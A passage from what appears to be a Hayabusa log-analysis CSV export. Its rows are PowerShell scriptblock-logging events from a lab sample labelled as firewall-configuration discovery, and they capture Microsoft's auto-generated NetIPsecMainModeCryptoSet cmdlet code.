Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' function Copy-NetIPsecMainModeCryptoSet { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"imv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, 